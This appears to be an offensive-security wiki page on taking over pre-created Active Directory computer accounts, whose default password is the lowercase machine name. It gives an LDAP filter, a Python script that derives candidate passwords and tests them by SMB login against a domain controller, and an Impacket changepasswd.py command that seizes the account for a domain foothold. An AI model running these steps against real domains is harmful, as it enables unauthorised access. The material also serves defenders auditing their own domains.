👾 Overview

A legacy option available when pre-creating a machine account insecurely sets its password to the account name in lowercase.

If a machine account is created with the "Assign this computer account as a pre-Windows 2000 computer" option checked, its password is set to the account name (the computer name, without the trailing $) in lowercase. It stays that way until the password is changed or the machine is actually joined to the domain, at which point the join process sets a new password.

🔍 Discovery

Computer accounts that have both the PASSWD_NOTREQD (0x20) and WORKSTATION_TRUST_ACCOUNT (0x1000) flags set in userAccountControl, i.e. a userAccountControl value of 4128 when no other flags are set, are pre-created accounts that haven't yet been onboarded to the domain.

You can test this by authenticating to the domain controller over SMB as the account (e.g. WS01$) using the lowercase account name as the password. If the error STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT is returned, the DC accepted the password but refused an SMB logon for the trust account, which means you've found a vulnerable pre-created account. A plain STATUS_LOGON_FAILURE means the default password has already been changed.
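The discovery steps above, worked into a small script. This is an added example, not code from the page or from TrustedSec: it builds the LDAP filter for the two userAccountControl flags, derives the default password from sAMAccountName, and interprets the NTSTATUS code of a login attempt. The offline helpers run over a constructed sample of LDAP results; only `check_over_smb()` (which assumes Impacket is installed and a DC is reachable) touches the network.

```python
"""Spot pre-created (pre-Windows 2000) computer accounts and derive their default password.

Offline helpers run on constructed sample data; check_over_smb() needs impacket and a
reachable DC and is the only function that touches the network.
"""

# userAccountControl bits that matter here (values from MS-ADTS)
ACCOUNTDISABLE            = 0x0002
PASSWD_NOTREQD            = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000
PRECREATED_UAC = PASSWD_NOTREQD | WORKSTATION_TRUST_ACCOUNT   # 0x1020 == 4128

# NTSTATUS codes seen on the SMB session setup
STATUS_LOGON_FAILURE                     = 0xC000006D
STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0xC0000199

# LDAP extensible-match rule for a bitwise AND on integer attributes
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def ldap_filter() -> str:
    """Filter matching computer objects that carry both flags, whatever else is set."""
    return (
        "(&(objectClass=computer)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={PASSWD_NOTREQD})"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={WORKSTATION_TRUST_ACCOUNT}))"
    )


def is_precreated(uac: int) -> bool:
    """True when both flags are set and the account is not disabled."""
    return (uac & PRECREATED_UAC) == PRECREATED_UAC and not (uac & ACCOUNTDISABLE)


def default_password(sam_account_name: str) -> str:
    """Pre-Windows 2000 default: the computer name (sAMAccountName without '$') in lowercase."""
    return sam_account_name.rstrip("$").lower()


def candidates(entries):
    """Return (sAMAccountName, candidate password) for every pre-created account."""
    return [
        (e["sAMAccountName"], default_password(e["sAMAccountName"]))
        for e in entries
        if is_precreated(int(e["userAccountControl"]))
    ]


def classify_ntstatus(code: int) -> str:
    """Interpret the session-setup result of a login attempt with the default password."""
    if code == STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT:
        # The DC validated the password but refuses an SMB logon for a trust account:
        # this is the signature of a usable pre-created account.
        return "vulnerable: default password accepted, account not yet onboarded"
    if code == STATUS_LOGON_FAILURE:
        return "not vulnerable: default password rejected"
    return f"inconclusive: NTSTATUS 0x{code:08X}"


def check_over_smb(dc_ip: str, domain: str, sam_account_name: str) -> str:
    """Live check: NTLM login over SMB with the default password (needs impacket + network)."""
    # Imported here so the offline helpers above do not require impacket.
    from impacket.smbconnection import SMBConnection, SessionError

    conn = SMBConnection(dc_ip, dc_ip)
    try:
        conn.login(sam_account_name, default_password(sam_account_name), domain)
        return "logon accepted: account is no longer a restricted pre-created account"
    except SessionError as err:
        return classify_ntstatus(err.getErrorCode())


# Constructed sample of what an LDAP search for computer objects might return
SAMPLE_ENTRIES = [
    {"sAMAccountName": "WS01$",         "userAccountControl": 4096},    # joined workstation
    {"sAMAccountName": "PRECREATED01$", "userAccountControl": 4128},    # pre-created, never joined
    {"sAMAccountName": "OLDBUILD02$",   "userAccountControl": 4130},    # pre-created but disabled
    {"sAMAccountName": "DC01$",         "userAccountControl": 532480},  # domain controller
]

if __name__ == "__main__":
    print(ldap_filter())
    for name, pw in candidates(SAMPLE_ENTRIES):
        print(f"{name}: try password {pw!r} over SMB; expect "
              f"0x{STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT:08X} if vulnerable")
```

The filter uses the bitwise-AND matching rule rather than `userAccountControl=4128` so that accounts with additional flags set are still found; disabled accounts are excluded from the candidates because they cannot be logged on to even with the right password.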

📌 Exploitation

To take control of the account and actually use it, we need to change its password. Because the account cannot authenticate over SMB, use a password-change method that does not rely on an SMB session; one easy option is Impacket's changepasswd.py with the rpc-samr protocol (SAMR over plain RPC). The current password, the lowercase account name, goes after the colon in the target (it is prompted for if omitted):

changepasswd.py -protocol rpc-samr [DOMAIN]/[ACCOUNT NAME]\$:[account name in lowercase]@[DC IP] -newpass Password123

✨ Post-Exploitation

Once the password has been changed, the account can be used like any other authenticated domain principal: to carry out further attacks such as RBCD, or simply as an initial foothold in the domain when no user credentials are available.

📝 Resources

- TrustedSec: Pre-Created Computer Account Writeup